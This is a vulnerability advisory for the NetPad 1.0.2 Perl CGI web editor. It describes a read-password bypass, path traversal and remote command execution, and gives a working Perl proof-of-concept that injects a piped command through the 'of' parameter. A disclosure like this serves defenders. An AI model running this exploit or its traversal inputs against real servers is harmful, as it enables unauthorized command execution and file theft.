Levcgi.coms NetPad 1.0.2 Multiple Vulnerabilities Advisory
Discovered By b0iler(b0iler@hotmail.com) and
BrainRawt(brainrawt@hotmail.com)
About Netpad:
------------------
<quote from levcgi.com>
Easy to install and use text editor for your web browser! This NotePad like
program allows you to open your files and pages online in your browser and
edit their contents through the browser without forcing you to re-upload
your changes all the time! Extremely effecient and a must have tool for all
webmasters!
</quote from levcgi.com>
According to the website, ...NetPad has been downloaded 1225 times!
Vulnerable (tested) Versions:
--------------------
NetPad v 1.0.2
Vendor Contact:
----------------
4-28-02 - Emailed lev@taintedthoughts.com
Vulnerabilities:
-- Password Bypass
1. The website claims "password security feature to prevent unauthorized
access!",
but this is NOT true.
A password is not required to read files. It is only required to write
to files.
-- Path Traversal
2. Improper filtering of input allows one to enter the traditional
"../../../" into
the input field to crawl back through directories of the server hosting
netpad.cgi,
allowing one to view any file readable by the webserver.
-- Command Execution
3. Due to improper usage of the open() function and input filtering, it is
possible
for a malicious visitor to remotely execute commands on the server
hosting
netpad.cgi
Proof of Concept code can be found below............
Remote Command Execution Exploit (POC):
---------------------------------------
#!/usr/bin/perl
# exploit for levcgi's NetPad 1.0.2
#
# This could easily be done with any browser and alittle effort.
#
# requires LWP avaliable at
# http://www.linpro.no/lwp/libwww-perl-5.64.tar.gz
# also, the number of ../'s differs. It depends on what $basedir
# is set to in the netpad.cgi script
#
# usage: perl script.pl http://site.tld/cgi-bin/netpad.cgi
../../../../bin/command
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("your open call can be exploited" . $ua->agent);
my $req = new HTTP::Request POST => $ARGV[0];
$req->content_type('application/x-www-form-urlencoded');
foreach(@ARGV){ $of .= "$_ " unless($_ eq $ARGV[0]); }
$req->content("proc=open&of=${of}|");
my $res = $ua->request($req);
if ($res->is_success) { print $res->content . "\n\nit should have
worked.\n"; }
else { print "request failed.\n"; }
Fix:
------
No matter how well one filters input to this program, we recommend that the
program itself be protected by htaccess.
--------------------------------------------------------------------------
Did you (Lev) say something about stupid people doing stupid things? -
BrainRawt
_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com
